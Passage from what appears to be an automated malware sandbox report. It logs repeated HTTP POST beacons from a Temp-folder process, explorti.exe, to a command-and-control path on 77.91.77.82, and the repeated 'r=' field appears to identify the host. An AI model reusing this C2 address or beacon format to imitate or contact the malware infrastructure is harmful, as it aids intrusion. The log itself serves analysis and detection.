                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:57.725033045 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                126192.168.2.44986977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:57.843175888 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:58.555212021 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                127192.168.2.44987077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:58.566773891 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:59.274348021 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                128192.168.2.44987177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:59.388631105 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:00.083435059 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                129192.168.2.44987277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:00.092688084 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:00.790590048 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                130192.168.2.44987377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:00.910526037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:01.598658085 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                131192.168.2.44987477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:01.607511044 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:02.300925970 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                132192.168.2.44987577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:02.420214891 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:03.125586987 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                133192.168.2.44987677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:03.137552977 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:03.842461109 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                134192.168.2.44987777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:03.966561079 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:04.677542925 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                135192.168.2.44987877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:04.686247110 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:05.396435976 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                136192.168.2.44987977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:05.513591051 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:06.223711014 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                137192.168.2.44988077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:06.232382059 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:06.956571102 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                138192.168.2.44988177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:07.075541019 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:07.763421059 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                139192.168.2.44988277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:07.779616117 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:08.501566887 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                140192.168.2.44988377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:08.622385979 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:09.334642887 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                141192.168.2.44988477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:09.344191074 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:10.150197029 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                142192.168.2.44988577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:10.262713909 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:10.953598976 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                143192.168.2.44988677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:10.971347094 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:11.671976089 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                144192.168.2.44988777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:11.803349018 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:12.500478029 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                145192.168.2.44988877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:12.509263992 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:13.205002069 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                146192.168.2.44988977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:13.332566023 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:14.024214029 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                147192.168.2.44989077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
